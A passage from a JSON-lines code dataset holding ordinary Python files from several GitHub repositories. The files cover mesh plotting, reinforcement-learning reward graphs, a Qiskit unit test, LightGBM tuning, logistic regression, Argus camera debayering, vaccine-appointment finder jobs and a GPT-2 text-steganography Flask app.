curr_photo in os.listdir(person_dir):\n photo_path = person_dir + curr_photo\n CompVision.blur_photo(photo_path)\n except NotADirectoryError:\n print('{} CAUGHT. NOT A PERSON DIR'.format(person_dir))\n continue\n\n\nif __name__ == '__main__':\n print('This module can only be run from the main.py file')\n input()","repo_name":"anotida01/facenet","sub_path":"Classifier/TRAIN.py","file_name":"TRAIN.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71065896362","text":"import argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\n\ndef plot_off_mesh(filename):\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n num_vertices, num_faces, _ = map(int, lines[1].split())\n\n vertices = []\n for line in lines[2:2+num_vertices]:\n vertex = list(map(float, line.split()[0:3]))\n vertices.append(vertex)\n\n faces = []\n for line in lines[2+num_vertices:]:\n face = list(map(int, line.split()[1:]))\n faces.append(face)\n\n vertices = np.array(vertices)\n faces = np.array(faces)\n\n # Find the minimum and maximum values in each dimension\n min_coords = np.min(vertices, axis=0)\n max_coords = np.max(vertices, axis=0)\n \n # Translate and scale to fit within the unit cube (0, 1) in all dimensions\n translated_scaled_vertices = (vertices - min_coords) / (max_coords - min_coords)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n\n mesh = Poly3DCollection(translated_scaled_vertices[faces - 1], facecolors=\"cyan\", linewidths=1, edgecolors=\"r\", alpha=0.1)\n ax.add_collection3d(mesh)\n\n ax.set_xlabel(\"X\")\n ax.set_ylabel(\"Y\")\n ax.set_zlabel(\"Z\")\n\n plt.show()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Plot a 3D mesh from a .off file\")\n parser.add_argument(\"filename\", type=str, help=\"Path to the .off file\")\n args = parser.parse_args()\n\n plot_off_mesh(args.filename)\n\n","repo_name":"smjim/mcStas_optimization_reduction","sub_path":"plot_off.py","file_name":"plot_off.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37906299368","text":"import numpy as np\nfrom bipedalwalker.utils import utils\nimport matplotlib.pyplot as plt\n\n\n# # CACLA training\n# ep_reward_str = \"../gcloud-data/CACLA/ep_reward_arr.csv\"\n# posX_str = \"../gcloud-data/CACLA/posX_arr.csv\"\n\n# SPG training\nep_reward_str = \"../gcloud-data/SPG/ep_reward_arr.csv\"\navg_reward_str = \"../gcloud-data/SPG/avg_reward_arr.csv\"\nposX_str = \"../gcloud-data/SPG/posX_arr.csv\"\n\n# # CACLA testing\n# ep_reward_str = \"CACLA-ep_reward_arr.csv\"\n# avg_reward_str = \"CACLA-avg_reward_arr.csv\"\n# posX_str = \"CACLA-posX_arr.csv\"\n# t_str = \"CACLA-t_arr.csv\"\n\n# # SPG testing\n# ep_reward_str = \"SPG-ep_reward_arr.csv\"\n# avg_reward_str = \"SPG-avg_reward_arr.csv\"\n# posX_str = \"SPG-posX_arr.csv\"\n# t_str = \"SPG-t_arr.csv\"\n\nep_reward_arr = np.asarray(utils.loadFromCSV(ep_reward_str))\nposX_arr = np.asarray(utils.loadFromCSV(posX_str))\n# t_arr = np.asarray(utils.loadFromCSV(t_str))\navg_reward_arr = np.cumsum(ep_reward_arr)\nutils.saveToCSV(avg_reward_arr, avg_reward_str)\n\n# # plt.plot(ep_reward_arr)\n# plt.bar(np.arange(np.size(ep_reward_arr)), np.ravel(ep_reward_arr), width=0.2)\n# plt.title(\"CACLA Training Episode Reward\")\n# plt.xlabel(\"Episode\")\n# plt.ylabel(\"Reward\")\n# plt.show()\n#\n# # plt.plot(avg_reward_arr)\n# plt.bar(np.arange(np.size(avg_reward_arr)), np.ravel(avg_reward_arr), width=0.3)\n# plt.title(\"CACLA Training Average Reward\")\n# plt.xlabel(\"Episode\")\n# plt.ylabel(\"Reward\")\n# plt.show()\n#\n# # plt.plot(posX_arr)\n# plt.bar(np.arange(np.size(posX_arr)), np.ravel(posX_arr), width=0.4)\n# plt.title(\"CACLA Training Episode Last PosX\")\n# plt.xlabel(\"Episode\")\n# plt.ylabel(\"Position\")\n# plt.show()\n\n# # plt.plot(t_arr)\n# plt.bar(np.arange(np.size(t_arr)), np.ravel(t_arr))\n# plt.title(\"N timesteps before finish\")\n# plt.show()","repo_name":"RUKip/MachineLearningProject","sub_path":"bipedalwalker/makegraphs.py","file_name":"makegraphs.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"6234847383","text":"import unittest\nfrom datetime import timedelta, datetime\nfrom test.service.ibm_test_case import IBMTestCase\nimport pandas as pd\nfrom qiskit_ibm_experiment import IBMExperimentService, AnalysisResultData\nfrom qiskit_ibm_experiment.service.constants import RESULT_QUALITY_FROM_DATAFRAME\n\n\nclass TestExperiment(IBMTestCase):\n \"\"\"Test experiment.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Initial class level setup.\"\"\"\n # pylint: disable=arguments-differ\n super().setUpClass()\n cls._setup_service()\n\n @classmethod\n def _setup_service(cls):\n \"\"\"Get the service for the class.\"\"\"\n cls.service = IBMExperimentService(local=True)\n\n def test_default_preferences(self):\n \"\"\"Test getting default preferences.\"\"\"\n self.assertFalse(self.service.preferences[\"auto_save\"])\n\n def test_set_preferences(self):\n \"\"\"Test setting preferences.\"\"\"\n self.service.preferences[\"auto_save\"] = True\n self.assertTrue(self.service.preferences[\"auto_save\"])\n\n def test_default_options(self):\n \"\"\"Test getting default options.\"\"\"\n self.assertTrue(self.service.options[\"prompt_for_delete\"])\n\n def test_set_options(self):\n \"\"\"Test setting options.\"\"\"\n original_options = self.service.options\n self.service.set_option(prompt_for_delete=False)\n self.assertFalse(self.service.options[\"prompt_for_delete\"])\n self.service.options = original_options\n\n def test_prompt_for_delete_options(self):\n \"\"\"Test delete prompt is not displayed given the corresponding option\"\"\"\n original_options = self.service.options\n self.service.set_option(prompt_for_delete=False)\n self.assertTrue(\n self.service._confirm_delete(\"\")\n ) # should work without mock patch\n self.service.options = original_options\n\n def test_dataframe_to_analysis_result_list(self):\n \"\"\"Test conversion from dataframe to result list\"\"\"\n num_values = 2\n analysis_result_values = [\n {\"str\": \"foo\", \"float\": 3.14},\n {\"int\": 3, \"float\": 2.78},\n ]\n result_ids = [\n \"9347d04d97464c5c80bf10b064064914\",\n \"ca2a0a92d4224ea1802c48d1785a6ce7\",\n ]\n\n experiment_ids = [\n \"4347d04d97364c5c80bf10b064064914\",\n \"ba2a0a92d4224ea1802c48d1785a6ce8\",\n ]\n\n tags = [[\"qiskit_test\", \"foo\"], []]\n result_types = [\"type_A\", \"type_B\"]\n result_quality = [\"good\", \"bad\"]\n backends = [\"backend1\", \"backend2\"]\n device_components = [[\"Q0\", \"Q1\"], [\"Q2\"]]\n experiments = [\"T1\", \"T2\"]\n chisqs = [0.3, 0.5]\n sources = [\"qiskit\", \"qiskit\"]\n extras = [None, None]\n created_times = [\n datetime.now() - timedelta(days=1),\n datetime.now() - timedelta(days=2),\n ]\n d = {\n \"_result_id\": result_ids,\n \"_experiment_id\": experiment_ids,\n \"_tags\": tags,\n \"value\": analysis_result_values,\n \"name\": result_types,\n \"quality\": result_quality,\n \"components\": device_components,\n \"backend\": backends,\n \"experiment\": experiments,\n \"created_time\": created_times,\n \"chisq\": chisqs,\n \"_source\": sources,\n \"_extra\": extras,\n }\n df = pd.DataFrame(data=d)\n results = IBMExperimentService.dataframe_to_analysis_result_list(df)\n expected_results = [\n AnalysisResultData(\n result_id=result_ids[i],\n experiment_id=experiment_ids[i],\n result_data={\n \"_value\": analysis_result_values[i],\n \"_experiment\": experiments[i],\n \"_source\": sources[i],\n \"_extra\": extras[i],\n },\n result_type=result_types[i],\n quality=RESULT_QUALITY_FROM_DATAFRAME[result_quality[i]],\n backend_name=backends[i],\n creation_datetime=created_times[i],\n device_components=device_components[i],\n tags=tags[i],\n chisq=chisqs[i],\n )\n for i in range(num_values)\n ]\n for (result, expected_result) in zip(results, expected_results):\n self.assertEqual(result, expected_result)\n\n result_df = IBMExperimentService.analysis_result_list_to_dataframe(results)\n self.assertEqual(result_df.to_dict(), df.to_dict())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Qiskit-Extensions/qiskit-ibm-experiment","sub_path":"test/service/test_experiment.py","file_name":"test_experiment.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"24022109327","text":"from lightgbm import LGBMClassifier\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom lgbm_autotune.model.bagging_models import BaggingModels\n\n\nclass Objective:\n \"optuna tuning and stratified k-fold\"\n\n def __init__(self, X, y, model_registry):\n self.X = X\n self.y = y\n self.model_registry = model_registry\n\n def __call__(self, trial):\n static_params = {\n \"random_state\": 123,\n \"boosting_type\": \"gbdt\",\n \"objective\": \"binary\",\n }\n\n tune_params = {\n \"n_estimators\": trial.suggest_int(\"n_estimators\", 1, 10000),\n \"num_leaves\": trial.suggest_int(\"num_leaves\", 2, 256),\n \"min_child_samples\": trial.suggest_int(\"min_child_samples\", 3, 200),\n \"max_depth\": trial.suggest_int(\"max_depth\", 1, 8),\n \"learning_rate\": trial.suggest_float(\"learning_rate\", 0.01, 0.3),\n }\n\n all_params = {\n **tune_params,\n **static_params,\n }\n\n trial.set_user_attr(\"all_params\", all_params)\n\n # 5-Fold Stratified CV\n skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=123)\n\n # 各分割でのスコアを保存するリスト\n scores = []\n models = []\n\n for train_index, valid_index in skf.split(self.X, self.y):\n model = LGBMClassifier(**all_params)\n\n # データの分割\n X_train, X_valid = (\n self.X.iloc[train_index],\n self.X.iloc[valid_index],\n )\n y_train, y_valid = (\n self.y.iloc[train_index],\n self.y.iloc[valid_index],\n )\n\n model.fit(X_train, y_train, eval_metric=\"auc\")\n models.append(model)\n\n # モデルの評価\n y_pred = model.predict_proba(X_valid)[:, 1]\n score = roc_auc_score(y_valid, y_pred)\n\n # スコアの保存\n scores.append(score)\n\n bagging_model = BaggingModels(models=models)\n self.model_registry.register(trial.number, bagging_model)\n\n return sum(scores) / len(scores)\n","repo_name":"shogo-hs/LGBM-AutoTune","sub_path":"lgbm_autotune/model/objective.py","file_name":"objective.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"138244838","text":"import random\nimport numpy as np\nimport get_data\n# print(get_data.X_subset.shape)\n# print(get_data.y_subset.size)\n# print(get_data.y_subset[0:10])\n\n# def sigmoid(x,w,b): # takes single datapoint x\n# z=x*w.transpose() +b\n# s = 1/(1+np.exp(-z))\n# return\ndef sigmoid(x):\n # Activation function used to map any real value between 0 and 1\n return 1 / (1 + np.exp(-x))\n\ndef net_input(w, x):\n # Computes the weighted sum of inputs\n # print(x.size,w.size)\n return np.dot(x, w)\n\ndef probability(w, x):\n # Returns the probability after passing through sigmoid\n return sigmoid(net_input(w, x))\n\ndef cost_function(w, x, y):\n # Computes the cost function for all the training samples\n m = x.shape[0]\n y_alt= (y%9)/2\n total_cost = -(1 / m) * np.sum(y_alt * np.log(probability(w, x)) + (1 - y_alt) * np.log(\n 1 - probability(w, x)))\n return total_cost\n\ndef gradient(theta, x, y):\n # Computes the gradient of the cost function at the point theta\n m = x.shape[0]\n return (1 / m) * np.dot(x.transpose(), sigmoid(net_input(theta, x)) - y)\n\ndef prediction(w,x):\n p=probability(w,x)\n for i in range(p.size):\n if(p[i]>=0.5):\n p[i]=1\n else:\n p[i]=0\n return p\n\ndef error(w,x,y):\n p=prediction(w,x)\n m=y.size\n y=(y%9)/2\n error=0\n for i in range(p.size):\n if(p[i]!=y[i]):\n error=error+1\n error=error/m\n return error\ndef stochastic_gd(sample, label, num_it, learn_rate):\n n=label.shape[0]\n m=sample.shape[1]\n label=(label%9)/2\n w=np.ones(m)\n for i in range(num_it):\n nth=random.randint(0,int(n-1))\n xth=sample[nth:nth+1, :]\n yth= label[nth:nth+1]\n w=w-learn_rate*gradient(w,xth,yth)\n return w\n\n","repo_name":"tarxn/ELL409_assignments","sub_path":"Assignment_1/gd_functions.py","file_name":"gd_functions.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12466552594","text":"import yaml\nimport numpy as np\nimport cv2\nimport scipy.spatial.qhull as qhull\n\n'''\nArgus specific class and class functions to work with *.raw Argus sensor data\n\nDeBayering workflow:\n 1. Initialize cameraIO object\n 2. Call readRaw()\n 3. Call deBayerRawFrameOpenCV() if grayscale desired\n - Grayscale frame now saved in self.imGray\n OR\n Call deBayerRawFrameOpenCVForColor() if RBG desired\n - RGB components saved in self.imR, self.imG, self.imB\n'''\n\nclass cameraIO():\n '''\n Class containing camera data and functions'''\n\n def __init__(self, **kwargs):\n\n self.cameraID = kwargs.get('cameraID', 'c1')\n self.rawPath = kwargs.get('rawPath')\n self.yamlPath = kwargs.get('yamlPath', 'D:/WAMToolbox/cameraData.yml')\n self.nFrames = kwargs.get('nFrames', 1)\n self.xMin = kwargs.get('xMin', 0)\n self.xMax = kwargs.get('xMax', 500)\n self.yMin = kwargs.get('yMin', 0)\n self.yMax = kwargs.get('yMax', 1200)\n self.dx = kwargs.get('dx', 1)\n self.skip = kwargs.get('skip', 0)\n self.verbose = kwargs.get('verbose', True) # turn on/off print statements\n self.parallel = kwargs.get('parallel', True)\n def getCameraData(self):\n\n '''\n Loads camera data from yamlPath file containing camera intrinsic and extrinsic values\n \n '''\n with open(self.yamlPath, 'r') as f:\n self.cameraData = yaml.load(f, Loader=yaml.FullLoader)\n\n def readRaw(self):\n '''\n This function is utilized for opening *.raw Argus files prior to a debayering task,\n and adds the\n\n Must call this function before calling any debayering functions\n '''\n with open(self.rawPath, \"rb\") as my_file:\n self.fh = my_file\n cameraIO.readHeaderLines(self)\n cameraIO.readAIIIrawFullFrame(self)\n\n def readHeaderLines(self):\n '''\n Reads the header lines of a .raw file to obtain metadata to\n feed into deBayering function\n\n '''\n\n separated = dict()\n lines = dict()\n for i in range(25):\n lines[i] = self.fh.readline().decode(\"utf-8\").rstrip()\n\n temp = lines[i].split(':')\n if len(temp) != 1:\n temp1 = temp[0]\n temp2 = float(temp[1])\n separated[temp1] = temp2\n else:\n temp = lines[i].split(';')\n if len(temp) != 1:\n temp1 = temp[0]\n temp2 = temp[1]\n separated[temp1] = temp2\n\n self.header = separated\n self.w = int(separated['cameraWidth'])\n self.h = int(separated['cameraHeight'])\n\n def readAIIIrawCropped(self):\n \n '''\n This function reads AIII raw files and populates the self.raw object\n by reading the *.raw file frame by frame and adding each to the multi-\n dimensional array and cropping the frames based on the user defined\n umin, umax, vmin, vmax\n\n Attributes:\n self.raw: (ndarray) contains all raw sensor data from one camera,\n read from self.rawPath\n \n '''\n self.umin = self.cameraData[self.cameraID]['umin']\n self.umax = self.cameraData[self.cameraID]['umax']\n self.vmin = self.cameraData[self.cameraID]['vmin']\n self.vmax = self.cameraData[self.cameraID]['vmax']\n skipoffset = self.skip*32 + self.skip*self.w*self.h\n self.fh.seek(30, 1)\n\n print(\"working on camera\", self.cameraID)\n\n if skipoffset > 0:\n for i in range(self.nFrames):\n print(\"Reading frame {}\".format(i))\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=skipoffset)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n if i == 0:\n crop = data.reshape((self.h, self.w))\n del data\n I = crop[self.vmin:(self.vmax), self.umin:(self.umax)]\n else:\n crop = data.reshape((self.h, self.w))\n del data\n I = np.dstack((I, crop[self.vmin:(self.vmax), self.umin:(self.umax)]))\n\n del crop\n\n else:\n\n for i in range(self.nFrames):\n print(\"Reading frame {}\".format(i))\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n if i == 0:\n crop = data.reshape((self.h, self.w))\n del data\n I = crop[self.vmin:(self.vmax), self.umin:(self.umax)]\n else:\n crop = data.reshape((self.h, self.w))\n del data\n I = np.dstack((I, crop[self.vmin:(self.vmax), self.umin:(self.umax)]))\n\n del crop\n\n self.raw = I\n\n def readAIIIrawFullFrame(self):\n\n '''\n This function reads AIII raw files and populates the self.raw object\n by reading the *.raw file frame by frame and adding each to the multi-\n dimensional array without cropping the frames\n\n Attributes:\n self.raw: (ndarray) contains all raw sensor data from one camera,\n read from self.rawPath\n \n '''\n\n skipoffset = self.skip*32 + self.skip*self.w*self.h\n self.fh.seek(30, 1)\n if skipoffset > 0:\n for i in range(self.nFrames):\n\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=skipoffset)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n\n if i == 0:\n I = data.reshape((self.h, self.w))\n else:\n I = np.dstack((I, data.reshape((self.h, self.w))))\n\n del data\n self.raw = I\n\n else:\n\n for i in range(self.nFrames):\n if i%20 == 0 and self.verbose==True: print(f\"Reading rawFile {i/self.nFrames*100:.1f} %\")\n if i == 0:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h)\n else:\n binary = np.fromfile(file=self.fh, dtype=np.uint8, count=self.w * self.h, offset=32)\n\n data = np.uint8(binary)\n del binary\n if i == 0:\n I = data.reshape((self.h, self.w))\n else:\n I = np.dstack((I, data.reshape((self.h, self.w))))\n\n del data\n self.raw = I\n\n def deBayerRawFrame(self):\n '''\n deBayers a raw frame using Argus framework, adapted from\n original Matlab code from John Stanley\n\n Attributes:\n self.imGray:\n \n '''\n\n im = np.zeros(np.shape(self.raw))\n imGray = np.zeros(np.shape(self.raw))\n imR = np.zeros(np.shape(self.raw))\n imB = np.zeros(np.shape(self.raw))\n imG = np.zeros(np.shape(self.raw))\n\n for ib in range(self.nFrames):\n\n print('DeBayering frame {}'.format(ib))\n frame = self.raw[:, :, ib]\n\n # python code adpoted from Argus framework\n Bmin = [1, 3]\n Rmin = [2, 2]\n Gmin = [2, 3, 3, 2]\n\n B = frame.copy()\n xx = np.arange(Bmin[0], self.h, 2)\n for j in range(Bmin[1], self.w - 1, 2):\n B[xx - 1, j - 1] = np.mean((B[xx - 1, j - 2], B[xx - 1, j]), axis=0)\n\n for i in range(Bmin[0] + 1, self.h - 1, 2):\n B[i - 1, :] = np.mean((B[i - 2, :], B[i, :]), axis=0)\n\n R = frame.copy()\n xx = np.arange(Rmin[0], self.h - 1, 2)\n for j in range(Rmin[1], self.w - 1, 2):\n R[xx - 1, j - 1] = np.mean((R[xx - 1, j - 2], R[xx - 1, j]), axis=0)\n for i in range(Rmin[0] + 1, self.h - 1, 2):\n R[i - 1, :] = np.mean((R[i - 2, :], R[i, :]), axis=0)\n\n G = frame.copy()\n for i in range(Gmin[0], self.h - 1, 2):\n for j in range(Gmin[1], self.w - 1, 2):\n G[i - 1, j - 1] = np.mean((G[i - 2, j - 1], G[i, j - 1], G[i - 1, j], G[i - 1, j - 2]), axis=0)\n\n for i in range(Gmin[2], self.h - 1, 2):\n for j in range(Gmin[3], self.w - 1, 2):\n G[i - 1, j - 1] = np.mean((G[i - 2, j - 1], G[i, j - 1], G[i - 1, j], G[i - 1, j - 2]), axis=0)\n\n rgbArray = np.zeros((2048, 2448, 3), 'uint8')\n rgbArray[..., 0] = R\n rgbArray[..., 1] = G\n rgbArray[..., 2] = B\n imGrayscale = cv2.cvtColor(rgbArray, cv2.COLOR_BGR2GRAY)\n\n imGray[:, :, ib] = imGrayscale\n\n self.imGray = imGray\n\n def deBayerRawFrameOpenCVForColor(self):\n '''\n deBayers a raw frame utilizing the package opencv\n \n Use this function for debayering into an RGB image output\n \n '''\n\n im = np.zeros(np.shape(self.raw), dtype='uint8')\n\n imR = np.zeros(np.shape(self.raw), dtype='uint8')\n imB = np.zeros(np.shape(self.raw), dtype='uint8')\n imG = np.zeros(np.shape(self.raw), dtype='uint8')\n\n for ib in range(self.nFrames):\n\n print('DeBayering frame {}'.format(ib))\n frame = self.raw[:, :, ib]\n framecopy = np.uint8(frame)\n rgbArray = cv2.cvtColor(framecopy, cv2.COLOR_BayerGB2BGR)\n\n imR[:, :, ib] = rgbArray[:, :, 2]\n imB[:, :, ib] = rgbArray[:, :, 0]\n imG[:, :, ib] = rgbArray[:, :, 1]\n \n self.imR = imR\n self.imG = imG\n self.imB = imB\n\n def deBayerRawFrameOpenCV(self):\n\n '''\n deBayers a raw frame utilizing the package opencv\n \n Use this function for debayering into an grayscale\n image output\n \n '''\n\n im = np.zeros(np.shape(self.raw), dtype='uint8')\n self.imGrayCV = np.zeros(np.shape(self.raw), dtype='uint8')\n imR = np.zeros(np.shape(self.raw), dtype='uint8')\n imB = np.zeros(np.shape(self.raw), dtype='uint8')\n imG = np.zeros(np.shape(self.raw), dtype='uint8')\n\n if self.nFrames == 1: # used for limited memory operations\n frame = self.raw\n framecopy = np.uint8(frame)\n rgbArray = cv2.cvtColor(framecopy, cv2.COLOR_BayerGB2BGR)\n\n imGrayscale = cv2.cvtColor(rgbArray, cv2.COLOR_BGR2GRAY)\n self.imGrayCV[:, :] = np.uint8(imGrayscale)\n elif self.parallel is True:\n import multiprocessing as mp\n pool = mp.Pool(mp.cpu_count() - 1)\n # https://www.machinelearningplus.com/python/parallel-processing-python/\n imGrayscale = pool.starmap_async(cv2.cvtColor, [(np.uint8(self.raw[:,:,ib]), cv2.COLOR_BayerGB2GRAY)\n for ib in range(self.nFrames)]).get()\n pool.close()\n self.imGrayCV = np.array(imGrayscale, dtype=np.uint8)\n\n else:\n for ib in range(self.nFrames):\n if ib % 20 == 0 and self.verbose==True:\n print(f'debayering frame {ib}/{self.nFrames}')\n frame = self.raw[:, :, ib]\n framecopy = np.uint8(frame)\n rgbArray = cv2.cvtColor(framecopy, cv2.COLOR_BayerGB2BGR)\n imGrayscale = cv2.cvtColor(rgbArray, cv2.COLOR_BGR2GRAY)\n\n self.imGrayCV[:, :, ib] = np.uint8(imGrayscale)\n \n '''\n\n The following functions are utilized in rectification tasks specific to Argus,\n however they are no longer supported and maintained. For further photogrammetry\n tasks, refer to the corefunctions module within CoastalImageLib.\n \n '''\n\n def uvToXY(self):\n # Do we trust the edges?\n self.umin = self.cameraData[self.cameraID]['umin']\n self.umax = self.cameraData[self.cameraID]['umax']\n self.vmin = self.cameraData[self.cameraID]['vmin']\n self.vmax = self.cameraData[self.cameraID]['vmax']\n self.m = self.cameraData[self.cameraID]['m']\n Uu, Vv = np.meshgrid(np.arange(self.umin, self.umax, 1), np.arange(self.vmin, self.vmax, 1))\n\n U = Uu.ravel()\n V = Vv.ravel()\n # Change from Walton m-vector notation to DLT notation so don't have to use subscripts\n A = self.m[0]\n B = self.m[1]\n C = self.m[2]\n D = self.m[3]\n E = self.m[4]\n F = self.m[5]\n G = self.m[6]\n H = self.m[7]\n J = self.m[8]\n K = self.m[9]\n L = self.m[10]\n\n # Assign variable names to coefficients derived in solving for x,y, or z\n M = (E * U - A)\n N = (F * U - B)\n O = (G * U - C)\n P = (D - U)\n Q = (E * V - H)\n R = (F * V - J)\n S = (G * V - K)\n T = (L - V)\n\n Z = 0 * np.ones(len(U), )\n X = np.divide((np.multiply(np.multiply(N, S) - np.multiply(R, O), Z) + (np.multiply(R, P) - np.multiply(N, T))),\n (np.multiply(R, M) - np.multiply(N, Q)))\n Y = np.divide((np.multiply(np.multiply(M, S) - np.multiply(Q, O), Z) + (np.multiply(Q, P) - np.multiply(M, T))),\n (np.multiply(Q, N) - np.multiply(M, R)))\n\n self.Xx = np.reshape(X, [(self.vmax - self.vmin), (self.umax - self.umin)])\n self.Yy = np.reshape(Y, [(self.vmax - self.vmin), (self.umax - self.umin)])\n self.X = X\n self.Y = Y\n\n def cropFrames(self):\n\n '''\n Function called to crop a debayered frame\n \n '''\n\n self.gray = np.zeros(((self.vmax - self.vmin), (self.umax - self.umin), self.nFrames), dtype='uint8')\n\n if self.nFrames == 1:\n self.gray = self.imGrayCV[self.vmin:(self.vmax), self.umin:(self.umax)]\n else:\n for i in range(self.nFrames):\n self.gray[:, :, i] = self.imGrayCV[self.vmin:(self.vmax), self.umin:(self.umax), i]\n\n def frameInterp(self):\n\n self.xy = np.zeros([len(self.X), 2])\n self.xy[:, 0] = self.Y.flatten()\n self.xy[:, 1] = self.X.flatten()\n\n self.xnew = np.arange(self.xMin, self.xMax, self.dx)\n self.ynew = np.arange(self.yMin, self.yMax, self.dx)\n\n xgrid, ygrid = np.meshgrid(self.xnew, self.ynew)\n self.uv = np.zeros([xgrid.shape[0] * xgrid.shape[1], 2])\n self.uv[:, 0] = ygrid.flatten()\n self.uv[:, 1] = xgrid.flatten()\n\n cameraIO.interpWeights(self)\n\n self.grayInterp = np.zeros((len(self.ynew), len(self.xnew), self.nFrames), dtype='uint8')\n print(np.shape(self.grayInterp))\n\n if self.nFrames == 1:\n returned = cameraIO.interpolate(self, self.gray)\n self.grayInterp = returned.reshape(xgrid.shape[0], xgrid.shape[1])\n else:\n for i in range(self.nFrames):\n #print(\"interpolating frame {}\".format(i))\n returned = cameraIO.interpolate(self, self.gray[:, :, i])\n self.grayInterp[:, :, i] = returned.reshape(xgrid.shape[0], xgrid.shape[1])\n \n self.xgrid = xgrid\n self.ygrid = ygrid\n\n def interpWeights(self):\n #def interp_weights(xy, uv,d=2):\n #print(\"calculating Delauny for camera\", self.cameraID)\n tri = qhull.Delaunay(self.xy)\n simplex = tri.find_simplex(self.uv)\n vertices = np.take(tri.simplices, simplex, axis=0)\n temp = np.take(tri.transform, simplex, axis=0)\n delta = self.uv - temp[:, 2]\n bary = np.einsum('njk,nk->nj', temp[:, :2, :], delta)\n self.vtx = vertices\n self.wts = np.hstack((bary, 1 - bary.sum(axis=1, keepdims=True)))\n\n def interpolate(self, values):\n ret = np.einsum('nj,nj->n', np.take(values, self.vtx), self.wts)\n ret[np.any(self.wts < 0, axis=1)] = np.nan\n return ret","repo_name":"mailemccann/coastalimagelib","sub_path":"coastalimagelib/argusIO.py","file_name":"argusIO.py","file_ext":"py","file_size_in_byte":16459,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"30484780532","text":"import os\nimport logging\nimport datetime\n\nfrom vaccine_finder.config import (\n DEFAULT_INPUT_FILE,\n WINDOW_START,\n WINDOW_END,\n NOTIFY_VACCINE_USERS,\n DEBUG_VACCINE_FINDER,\n)\nfrom vaccine_finder.riteaid.finder import RiteAidAppointmentFinder\nfrom vaccine_finder.walgreens.finder import WalgreensAppointmentFinder\nfrom vaccine_finder.wegmans.finder import WegmansAppointmentFinder\nfrom vaccine_finder.allentown.finder import AllentownAppointmentFinder\n\n\nlogger = logging.getLogger('Jobs')\n\n\ndef in_range(t, start=WINDOW_START, end=WINDOW_END):\n \"\"\"\n Check whether a time falls within a time window\n \"\"\"\n if (t >= start) and (t <= end):\n return True\n return False\n\n\ndef _finder_job(finder):\n \"\"\"\n Vaccine Finder Job during time window\n \"\"\"\n t = datetime.datetime.now().time()\n logger.info(f\"Time: {t}, Window: {WINDOW_START} to {WINDOW_END}\")\n\n if in_range(datetime.datetime.now().time()):\n finder.find(notify=NOTIFY_VACCINE_USERS)\n else:\n logger.info(\n 'Not time to run type(finder).__name__ finder. Sleeping ...'\n )\n\n\ndef allentown_job():\n \"\"\"\n Allentown Health Clinic Vaccine Finder Job during time window\n \"\"\"\n f = AllentownAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n\n\ndef wegmans_job():\n \"\"\"\n Wegmans Vaccine Finder Job during time window\n \"\"\"\n f = WegmansAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n\n\ndef walgreens_job():\n \"\"\"\n Walgreens Vaccine Finder Job during time window\n \"\"\"\n f = WalgreensAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n\n\ndef riteaid_job():\n \"\"\"\n Riteaid Vaccine Finder Job during time window\n \"\"\"\n f = RiteAidAppointmentFinder(\n input_file=DEFAULT_INPUT_FILE,\n debug=DEBUG_VACCINE_FINDER\n )\n _finder_job(f)\n","repo_name":"znatty22/vaccine-finder","sub_path":"vaccine_finder/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74271184043","text":"from flask import Flask, render_template, request\nfrom utils import get_model\nfrom run_single import encoder, decoder\n\napp = Flask(__name__)\nenc, model = get_model(model_name='gpt2')\n@app.route(\"/\", methods=[\"GET\"])\ndef get_form():\n return render_template(\"form.html\")\n\n@app.route(\"/form\", methods=[\"POST\"])\ndef post_form():\n res = dict(request.form)\n \n try:\n\t if res['method'] == 'encrypt':\n\t text = encoder(res['message'], res['context'], enc, model)\n\t elif res['method'] == 'decrypt':\n\t \ttext = decoder(res['message'], res['context'], enc, model)\n\t else: \n\t \ttext='babalay'\n except Exception as 